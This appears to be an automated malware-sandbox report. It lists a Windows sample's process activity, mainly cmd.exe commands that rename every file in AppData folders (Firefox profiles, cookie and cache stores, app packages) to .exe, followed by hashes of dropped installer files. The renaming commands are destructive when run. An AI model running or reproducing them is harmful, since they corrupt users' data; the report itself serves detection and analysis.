"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Backup\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\oih2seup.Admin\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\safebrowsing\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\startupCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\thumbnails\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\doomed\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\cache2\entries\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\s2p9ahae.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.NarratorQuickStart_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.XGpuEjectDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\NcsiUwpApp_8wekyb3d8bbwe\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\windows_ie_ac_001\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"

Network


Files

C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe

C:\2d1a5f6ae1e78fa0c8bf8beaee61\SetupEngine.dll

MD5 84c1daf5f30ff99895ecab3a55354bcf
SHA1 7e25ba36bcc7deed89f3c9568016ddb3156c9c5a
SHA256 7a0d281fa802d615ea1207bd2e9ebb98f3b74f9833bba3cb964ba7c7e0fb67fd
SHA512 e4fb7e4d39f094463fdcdc4895ab2ea500eb51a32b6909cec80a526bbf34d5c0eb98f47ee256c0f0865bf3169374937f047bf5c4d6762779c8ca3332b4103be3

C:\2d1a5f6ae1e78fa0c8bf8beaee61\sqmapi.dll

MD5 3f0363b40376047eff6a9b97d633b750
SHA1 4eaf6650eca5ce931ee771181b04263c536a948b
SHA256 bd6395a58f55a8b1f4063e813ce7438f695b9b086bb965d8ac44e7a97d35a93c
SHA512 537be86e2f171e0b2b9f462ac7f62c4342beb5d00b68451228f28677d26a525014758672466ad15ed1fd073be38142dae478df67718908eae9e6266359e1f9e8

C:\2d1a5f6ae1e78fa0c8bf8beaee61\DHTMLHeader.html

MD5 cd131d41791a543cc6f6ed1ea5bd257c
SHA1 f42a2708a0b42a13530d26515274d1fcdbfe8490
SHA256 e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb
SHA512 a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a

C:\Users\Admin\AppData\Local\Temp\HFI422A.tmp.html

MD5 4bf87b5e9addb090d5292d442618e9f8
SHA1 c4f2ac5c3826897a9154b160f233b94d54a19d46
SHA256 32a4d57c10aae3b712d0e0bc9eb5381cf5f89ded96e104fac231754ad29f97bf
SHA512 e5566d73e314bb76880334f388a330787505e50659998b6ec97088b719703d17a9234172c537cf72e7f1c3f45cd287c7bef9e42ab21f3b19c74e7a98349e62e6

C:\2d1a5f6ae1e78fa0c8bf8beaee61\UiInfo.xml

MD5 8b8b0a935dc591799a0c6d52fdc33460
SHA1 ce2748bd469aad6e90b06d98531084d00611fb89
SHA256 57a9ccb84cae42e0d8d1a29cfe170ac3f27bdcae829d979cddfd5e757519b159
SHA512 93009b3045939b65a0c1d25e30a07a772bd73dda518529462f9ce1227a311a4d6fd7595f10b4255cc0b352e09c02026e89300a641492f14df908ad256a3c9d76

C:\2d1a5f6ae1e78fa0c8bf8beaee61\ParameterInfo.xml

MD5 7213da83e0f0b8ae4fea44ae1cb7f62b
SHA1 f2e3fcc77a1ad4d042253bd2e0010bcb40b68ed3
SHA256 59e67e4fb46e5490eee63d8b725324f1372720ade7345c74c6138c4a76ea73d9
SHA512 86186ab0f2cb38e520dd1284042eced157f96874846eb9061be9cf56b84a1cab5901a4879e105a8b04b336bbc43b03f4bdf198d43af868be188602347db829e0

C:\2d1a5f6ae1e78fa0c8bf8beaee61\SplashScreen.bmp

MD5 0966fcd5a4ab0ddf71f46c01eff3cdd5
SHA1 8f4554f079edad23bcd1096e6501a61cf1f8ec34
